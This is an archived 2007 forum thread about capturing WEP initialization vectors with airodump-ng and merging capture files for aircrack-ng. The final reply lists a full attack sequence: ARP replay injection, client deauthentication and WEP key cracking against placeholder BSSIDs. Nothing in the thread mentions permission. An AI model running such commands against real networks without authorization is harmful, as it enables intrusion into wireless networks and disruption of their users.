PDA

View Full Version : adding additional IV's to an existing capture file possibe?


john99
03-14-2007, 04:37 PM
Hi,

I startd to capture with "airodump-ng -c <chan> -w <file> --ivs ath1.
When I restart capturing the old capture file is overwritten.

Is there a way to add IVS from a new scan to an already existing capture file? How?


Any feedback is apprecaited very much! Thank you,

John

Mr.Octopus
03-14-2007, 07:37 PM
just create two files and list them both in the aircrack arguments, easiest way

mikem1983
03-15-2007, 12:20 AM
You can always start cracking while you are capturing.

CubanCigarSmoker
03-15-2007, 12:52 AM
Try this string....

airmon-ng start wifi0 11
airodump-ng --ivs -w dump --channel [channel] ath1
aireplay-ng -b [bssid] -h [client] --arpreplay ath1
aireplay-ng -a [bssid] -c [client] --deauth 30 ath1
aircrack-ng -b [bssid] dump*.ivs
aircrack-ng -b [bssid] -n 64 dump*.ivs

I hope this helps. I notice when I use this string, I get lots of different dump.ivs files. Remember tho, I'm a noob sooooooo.....;)